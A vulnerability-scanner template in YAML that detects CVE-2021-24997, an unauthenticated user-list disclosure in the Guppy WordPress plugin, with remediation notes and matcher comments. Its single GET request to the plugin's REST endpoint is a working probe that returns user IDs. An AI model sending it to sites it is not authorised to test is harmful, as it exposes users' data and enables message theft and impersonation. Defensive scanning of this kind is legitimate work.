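# Detection template for CVE-2021-24997. It checks whether the Guppy WordPress
# plugin's REST endpoint returns its user list to a request that defines no
# credentials.
#
# Remediation for a confirmed finding: update the plugin past the affected
# range given in the description (see the Patchstack reference), then re-run
# the check to confirm the endpoint no longer answers anonymous requests.
id: CVE-2021-24997

info:
  name: CVE-2021-24997
  author: Evan Rubinstein
  # Derived from the CVSS score in `classification` (5.4 is in the 4.0-6.9
  # "medium" band). The original listing had no severity field.
  severity: medium
  # Folded scalar: the two source lines form a single logical sentence.
  description: >-
    Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an
    API disclosure vulnerability which allows remote unauthenticated attackers
    to obtain all user IDs, and then use that information to make API requests
    to either get messages sent between users, or send messages posing as one
    user to another.
  reference:
    - https://www.exploit-db.com/exploits/50540
    - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24997
  classification:
    cvss-score: 5.4
    cve-id: CVE-2021-24997
    cwe-id: CWE-200
  tags: wordpress,guppy,api,cve2021,cve,wp-plugin

requests:
  # The original listing left `method:` empty, which YAML parses as null.
  # The path is a plain query-string fetch, so the method is GET.
  # No authentication headers are defined, so a match means the endpoint
  # answered without credentials.
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="

    # Both matchers must pass: HTTP 200 AND all three JSON keys in the body.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Content match on key names only. It does not inspect the plugin
      # version, so confirm a hit against the installed plugin release
      # before reporting it.
      - type: word
        part: body
        words:
          - '"guppyUsers":'
          - '"userId":'
          - '"type":'
        condition: and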